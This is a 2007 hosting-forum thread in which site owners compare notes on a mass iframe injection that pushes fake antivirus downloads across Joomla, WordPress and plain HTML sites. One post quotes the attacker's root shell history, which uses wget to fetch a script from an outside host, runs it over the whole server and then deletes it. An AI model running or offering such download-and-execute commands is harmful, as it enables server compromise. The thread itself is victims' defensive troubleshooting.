Another hacker attack

**EuroNut** · 09-19-2007, 07:46 AM

Yesterday I happened to check on one of my sites and all hell broke loose

Firefox minimized and up popped a small window telling me my PC was infested with porn, virus and spyware files and that I should download and run a cleaner to de-infest it.

I'm not one to fall for such silly tricks so I went back to my site to take a look at the source code - There, right underneath the <body> tag was a new piece of IFRAME code pointing to a php script on another web site containing an affiliate reference of RAZEK (I'm deliberately not posting the whole code here, but there's enough info above for you to take a look at your own site(s) to see if he's hit you too).

It turned out that he'd hit about 12 of my sites - Originally I thought it was only Joomla sites affected, but a couple that are just plain html had also been hit. This is all on a cPanel VPS running CentOS. A quick Google sees this attack showing up elsewhere, and on Wordpress and phpBB sites too.

Has anyone come across this before? If so, how did he get onto your site to make the changes?

I've previously worked through the JagPC security FAQ, got register_globals turned off, set important files to permission 644 etc, and various other measure they suggest. Unfortunately, I didn't have "save raw access logs" turned on so I can't go back this time to see how he got in. (I've got the logs being saved and backed up now, but it's a bit late for this time around).

Any clues / ideas / suggestions / previous experiences folks?

**lloyd_borrett** · 09-19-2007, 08:53 AM

I've been getting this same sort of attack across a number of my JaguarPC accounts over the last few days. I still haven't found how they are getting in.

Any suggestions?

**Gwaihir** · 09-19-2007, 09:34 AM

Originally Posted by lloyd_borrett

Any suggestions?

Search webhostingtalk? If it's well beyond JagPC, folks are likely to be posting about it there too.

**eks** · 09-19-2007, 01:41 PM

I had the same attack happen on my VPS on the 13th and another one yesterday.

They were able to log on as root via SSH from ips 83.149.87.156 & 84.244.174.54. They then executed a script that went through all the files in the server and added the malicious code snippet to any HTML page found.

The .bash_history file in root home folder shows the commands they executed:

wget http://www.donefind.com/frame.sh
wget http://www.donefind.com/frame.htm
chmod 777 ./frame.sh
./frame.sh frame.htm /
rm -f ./frame.sh
who -a

Per JagPC, "have your developer audit(sic?) your code and make scripts more secure". So, I would like to ask those of you who sustained these recent attacks to list your installations and perhaps find a commonality.

These are the following that are installed across the several sites I host:
WordPress 2.1.3 with Akismet 2.0 and WP-Polls 2.14 (AJAX)
phpBB 3 RC5
Mantis Bug Tracker 1.0.8
DokuWiki 2007-06-26

**lloyd_borrett** · 09-19-2007, 02:41 PM

I'm being constantly hacked on three different accounts right now. The only common open source application across all three accounts is mySQLdumper.

Best Reagrds, Lloyd Borrett.

**EuroNut** · 09-19-2007, 03:28 PM

Originally Posted by Gwaihir

Search webhostingtalk? If it's well beyond JagPC, folks are likely to be posting about it there too.

Well I'm researching like mad, on WHT and elsewhere, but as yet I haven't found a common factor to help pin this down.

Take all the following with a large pinch of salt and try not to draw conclusions, because they simply don't tie together to give any real answers. Here's a few of the "facts" I've found so far:

1) It's a Windows 2003 Server (SP2) exploit
2) It's an exploit in the latest cPanel (But 10,000 sites in Europe got attacked some months ago before the current cPanel came out)
3) It only happens on Fedora machines
4) It also happens on CentOS machines
5) It's a keystroke logger which captures your banking info and the root password to your server, and that is then used to run a server-wide insert on all index.* files

The list goes on and on, so I regret to report that I have absolutely ZILCH to report so far. (But I'm still looking!!)

(Note: The facts above are only facts until replaced by other facts with later sell-by dates)

I'll let you know when I get something even slightly useful.

**EuroNut** · 09-19-2007, 03:36 PM

Originally Posted by eks

They were able to log on as root via SSH .... They then executed a script

That's my favourite suspect right now, but still looking ....

Originally Posted by eks

These are the following that are installed across the several sites I host:
WordPress 2.1.3 with Akismet 2.0 and WP-Polls 2.14 (AJAX)
phpBB 3 RC5
Mantis Bug Tracker 1.0.8
DokuWiki 2007-06-26

Mine were Joomla 1.0.13 sites, and totally vanilla HTML pages on other sites. The wide range of sites catching this monkey suggests to me that it's not a vunerability in any particular script - In fact, I have a domain with a mini web page, which comprises 4 lines of HTML, saying "this domain does not have a web site" and THAT got hacked!

**EuroNut** · 09-19-2007, 03:45 PM

I think it might be useful if we carry on with this over in:

Hacker Attack

Masood is on the case, and having all the feedback on this in one place might be a big help.